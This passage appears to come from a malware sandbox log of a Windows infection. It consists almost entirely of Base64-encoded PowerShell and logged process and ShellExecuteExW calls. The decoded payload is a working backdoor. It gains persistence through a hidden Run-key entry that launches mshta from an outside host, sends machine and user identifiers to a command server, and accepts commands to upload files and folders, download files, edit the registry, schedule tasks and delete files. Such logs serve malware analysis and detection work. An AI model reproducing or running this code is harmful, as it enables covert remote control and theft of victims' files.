G4AcwBlAFMAdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwB9AH0AZABvAHsAVAByAHkAewAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAAPQAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJwAnADsASQBmACAAKAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnACcAKQB7ACQAZQBWAGoAVgBPAEcASQBLAE0ARABVAEMAPQAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4ATABlAG4AZwB0AGgAIAAtACAAMgApADsAJABjAGkAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAFYAagBWAE8ARwBJAEsATQBEAFUAQwApACkAOwBpAGYAIAAoACQAYwBpAGUAKQB7AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZgBpAGwAZQBpAG4AZgBvADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADkAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAGMAcwB2ACcAOwBHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABNAGUAagBYAEMAIAAtAEYAaQBsAHQAZQByACAAKgAuACoAIAAtAFIAZQBjAHUAcgBzAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAE4AYQBtAGUALAAgAEwAZQBuAGcAdABoACwAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACwAIABGAHUAbABsAG4AYQBtAGUAIAB8ACAARQB4AHAAbwByAHQALQBDAHMAdgAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACAALQBGAG8AcgBjAGUAIAAtAE4AbwBUAHkAcABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAC0ARQBuAGMAbwBkAGkAbgBnACAAdQB0AGYAOAA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAaQBuAGYAbwAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAHoAaQBwACcAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAAJABNAGUAagBYAEMAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEQAagBVAHUAaQAgACQASABaAGcAcQBmAEIASwBYACAAJABmAGkAbABlAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAE0AZQBqAFgAQwAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQATQBlAGoAWABDAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEQATQBFAEgAcwBRAEsAVgBVAGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAdABhAHMAawA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA1ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewAkAEEAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AOwAkAFMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBPAG4AYwBlACAALQBBAHQAIAAoAEcAZQB0AC0ARABhAHQAZQApACAALQBSAGUAcABlAHQAaQB0AGkAbwBuAEkAbgB0AGUAcgB2AGEAbAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAAMQAwACkAOwAkAFQAYQBzAGsAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAFQAcgBpAGcAZwBlAHIAIAAtAFMAZQB0AHQAaQBuAGcAcwAgACQAUwBlAHQAdABpAG4AZwBzADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVABhAHMAawBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABUAGEAcwBrADsAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAWABhAE4AcwBZAEoAYgBYAGoAVABuACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwB6AGkAcAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQATQBlAGoAWABDAD0AJABjAGkAZQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABNAGUAagBYAEMALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAZQBsADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABNAGUAagBYAEMAOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA= filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000414	1	1	0
ShellExecuteExW Sept. 4, 2023, 10:28 a.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4ADsAJABWAHMAVgBtAGEARABqACAAPQAgADEAMAAyADQAIAAqACAAMQAwADIANAA7ACQAeAB3AGIAcAB5AG0AZABVAFcATgBzACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJABIAFoAZwBxAGYAQgBLAFgAIAA9ACAAJwBoAHQAdABwADoALwAvAG4AYQB2AGUAcgBjAG8AcgBwAC4AcgB1AC8AZABhAHMAaABiAG8AYQByAGQALwBpAG0AYQBnAGUALwAyADAAMgAzADAAMgAvAGMAbwBtAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJAB4AHcAYgBwAHkAbQBkAFUAVwBOAHMAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAagBYAFMAaABBAGUAZwBNAEUAVwBNAHcAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAtAE4AYQBtAGUAIABmAEcAWgB0AE0AIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAAMwA5ADEANwA2ADMAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwBuAGEAdgBlAHIAYwBvAHIAcAAuAHIAdQAvAGQAYQBzAGgAYgBvAGEAcgBkAC8AaQBtAGEAZwBlAC8AMgAwADIAMwAwADIALwA0AC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAoACQAQwB6AHIASAAsACAAJABqAGQAVwBWACkAewAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBkAFcAVgApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBhAHAAcABsAGkAYwBhAHQAaQBvAG4ALwB4AC0AdwB3AHcALQBmAG8AcgBtAC0AdQByAGwAZQBuAGMAbwBkAGUAZAAnADsAJABWAGYAdABZAFoASAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABJAEoAYgBOAGcAcABSAGcAVQBMAEUAVABEAC4ATABlAG4AZwB0AGgAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQALAAgADAALAAgACQASQBKAGIATgBnAHAAUgBnAFUATABFAFQARAAuAEwAZQBuAGcAdABoACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4ARgBsAHUAcwBoACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBDAGwAbwBzAGUAKAApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAgACQAUgBLAGMAbAAgAD0AIAAkAFYAZgB0AFkAWgBIAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQARAB5AGMARAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAUgBLAGMAbAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUATABUACAAPQAgACQARAB5AGMARAAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEQAagBVAHUAaQAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACwAIAAkAHQAdQBwACwAIAAkAGIAQgBxAGwAVgApAHsAJABUAGkAbQBlAG8AdQB0AD0AMQAwADAAMAAwADAAMAAwADsAJABDAFIATABGACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAARAApACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAAQQApADsAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAPQAgACcALQAtACcAOwAkAEIAbwB1AG4AZABhAHIAeQAgAD0AIAAnACoAKgAqACoAKgAnADsAJABzAHQAcgBlAGEAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBPAHAAZQBuAFIAZQBhAGQAKAAkAHYAUABFAGEAdgBSAE8AagB2AG4AKQA7ACQATAByAEIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABWAHMAVgBtAGEARABqADsAdwBoAGkAbABlACgAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABMAHIAQgAsADAALAAkAFYAcwBWAG0AYQBEAGoAKQApAHsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBUAGkAbQBlAG8AdQB0ACAAPQAgACQAVABpAG0AZQBvAHUAdAA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUAIAA9ACAAJABWAGYAdABZAFoASAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQAdAB1AHAAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABiAEIAcQBsAFYAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQ